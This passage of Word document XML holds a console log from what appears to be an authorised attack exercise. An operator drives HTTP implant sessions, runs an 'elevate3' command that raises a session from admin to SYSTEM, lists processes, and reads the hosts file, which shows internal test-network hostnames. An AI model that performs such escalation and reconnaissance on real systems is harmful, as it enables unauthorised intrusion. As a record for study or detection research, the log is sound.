    <w:p w14:paraId="3DBC8927" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [W2] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E6815A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19FD078E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B178C5C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W2        128.55.12.167:51588 --&gt;   128.55.12.167:8110  [HTTP]  Fri May 17 16:12:33 2019        active 3s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71705A9E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W1        128.55.12.167:51587 --&gt;   128.55.12.167:8110  [HTTP]  Fri May 17 16:12:31 2019        active 5s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E515E40" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con W1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1299AB06" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C42BCB4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E0FB9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BDE6E1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-fivedirections-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F01D5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;elevate3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0615C8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Elevate3 using generated file name [PD2GziBJ2wpDwP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467E657C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] elevate success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0818FD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B3A509" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCF1F50" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF1201F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>On target run as admin sc start filemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366A19DB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;elevate3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6EC32C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Elevate3 using generated file name [7B4qoq3yWIKPQh]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774235F0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] elevate success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C38EA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC0453E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D4C5E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD77AC1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478D1854" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W4        128.55.12.167:51590 --&gt;   128.55.12.167:8110  [HTTP]  Fri May 17 16:14:32 2019        active 9s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEB1CAB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W3        128.55.12.167:51589 --&gt;   128.55.12.167:8110  [HTTP]  Fri May 17 16:14:25 2019        active 16s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B790E7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W2        128.55.12.167:51588 --&gt;   128.55.12.167:8110  [HTTP]  Fri May 17 16:12:33 2019        DEAD 112s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353EE461" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W1        128.55.12.167:51587 --&gt;   128.55.12.167:8110  [HTTP]  Fri May 17 16:12:31 2019        DEAD 125s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CC3DD2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6C804C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0382C9BE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B82213D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A42093C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;elevate3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269281A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Elevate3 using generated file name [DXu0yAtkCpuUTo]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0734371B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] elevate success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7932A91F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278F11CF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AAFC4E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589E0876" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B785B0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38907D37" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A207D60" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B768FE8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] C:\Users\admin\Documents\Pictures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7BB4C9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD36673" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0E250B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AFD39D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5605DA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;cd Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2B518B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;cd System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3F0B3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;cd drivers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E95ED80" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;cd etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C5259C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E40B0E8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 03/05/2019 06:05 PM    &lt;DIR&gt;         .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CF88F4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 03/05/2019 06:05 PM    &lt;DIR&gt;         ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC5B5DC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 04/16/2019 05:31 PM             1650 hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DE7BC2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 09/29/2017 01:44 PM             3683 lmhosts.sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3E9C37" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 03/18/2017 09:01 PM              407 networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFBC28B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 03/18/2017 09:01 PM             1358 protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78634328" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 03/18/2017 09:01 PM            17635 services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13144EB2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 03/05/2019 06:04 PM               70 tc-version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1BAB34" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7983A7A1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC2BF1A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W4&gt;cat hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2A2CC7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] # Copyright (c) 1993-2009 Microsoft Corp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69048A15" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3245E1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># This is a sample HOSTS file used by Microsoft TCP/IP for Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AFCB6A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081B72F5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># This file contains the mappings of IP addresses to host names. Each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2015E57E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># entry should be kept on an individual line. The IP address should</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0311C701" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># be placed in the first column followed by the corresponding host name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0C15A1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># The IP address and the host name should be separated by at least one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A69808" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502353E1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7655CAEF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># Additionally, comments (such as these) may be inserted on individual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545717C0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># lines or following the machine name denoted by a '#' symbol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C37145E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5815180A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4812D2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3406DE4D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#      102.54.94.97     rhino.acme.com          # source server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B0BEA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#       38.25.63.10     x.acme.com              # x client host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F54BE9E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># localhost name resolution is handled within DNS itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11216621" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#       127.0.0.1       localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4957B257" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#       ::1             localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44618FD8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1               ta1-fivedirections-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD81BF2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.58            ta1-fivedirections-translate-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B501E3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.160           ta1-fivedirections-translate-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39161564" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.52            ta3-test-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3F7273" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.73            ta3-prometheus-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60166670" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.74            ta3-prometheus-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5664CD86" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.59            ta3-starc-1-dp kafka-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742D6AAA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.60            ta3-starc-2-dp kafka-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D61E58F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.61            ta3-starc-3-dp kafka-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB064B4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.62            ta3-starc-4-dp kafka-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1451B7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.63            ta3-starc-5-dp kafka-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8FAAED" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
